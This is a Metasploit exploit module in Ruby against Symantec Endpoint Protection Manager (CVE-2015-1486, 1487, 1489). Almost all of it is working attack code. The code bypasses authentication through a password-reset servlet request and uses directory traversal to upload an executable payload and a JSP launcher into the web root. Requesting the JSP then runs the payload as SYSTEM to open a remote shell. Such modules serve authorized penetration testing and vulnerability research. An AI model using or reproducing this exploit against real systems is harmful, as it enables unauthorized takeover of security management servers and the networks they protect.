Symantec Endpoint Protection Manager Authentication Bypass / Code Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FileDropper  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',  
'Description' => %q{  
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager  
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities  
include an authentication bypass, a directory traversal and a privilege escalation to  
get privileged code execution.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Markus Wulftange', #discovery  
'bperry' # metasploit module  
],  
'References' =>  
[  
['CVE', '2015-1486'],  
['CVE', '2015-1487'],  
['CVE', '2015-1489'],  
['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']  
],  
'DefaultOptions' => {  
'SSL' => true  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic',  
{  
'Arch' => ARCH_X86,  
'Payload' => {  
'DisableNops' => true  
}  
}  
],  
],  
'Privileged' => true,  
'DisclosureDate' => 'Jul 31 2015',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(8443),  
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),  
], self.class)  
end  
  
def exploit  
meterp = Rex::Text.rand_text_alpha(10)  
jsp = Rex::Text.rand_text_alpha(10)  
  
print_status("#{peer} - Getting cookie...")  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),  
'method' => 'POST',  
'vars_post' => {  
'ActionType' => 'ResetPassword',  
'UserID' => 'admin',  
'Domain' => ''  
}  
})  
  
unless res && res.code == 200  
fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")  
end  
  
cookie = res.get_cookies  
  
if cookie.nil? || cookie.empty?  
fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")  
end  
  
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>  
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>  
}  
  
print_status("#{peer} - Uploading payload...")  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),  
'method' => 'POST',  
'vars_get' => {  
'ActionType' => 'BinaryFile',  
'Action' => 'UploadPackage',  
'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",  
'KnownHosts' => '.'  
},  
'data' => payload.encoded_exe,  
'cookie' => cookie,  
'ctype' => ''  
})  
  
unless res && res.code == 200  
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")  
end  
  
register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")  
  
print_status("#{peer} - Uploading JSP page to execute the payload...")  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),  
'method' => 'POST',  
'vars_get' => {  
'ActionType' => 'BinaryFile',  
'Action' => 'UploadPackage',  
'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",  
'KnownHosts' => '.'  
},  
'data' => exec,  
'cookie' => cookie,  
'ctype' => ''  
})  
  
unless res && res.code == 200  
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")  
end  
  
register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")  
  
print_status("#{peer} - Executing payload. Manual cleanup will be required.")  
send_request_cgi({  
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")  
}, 5)  
end  
end  
`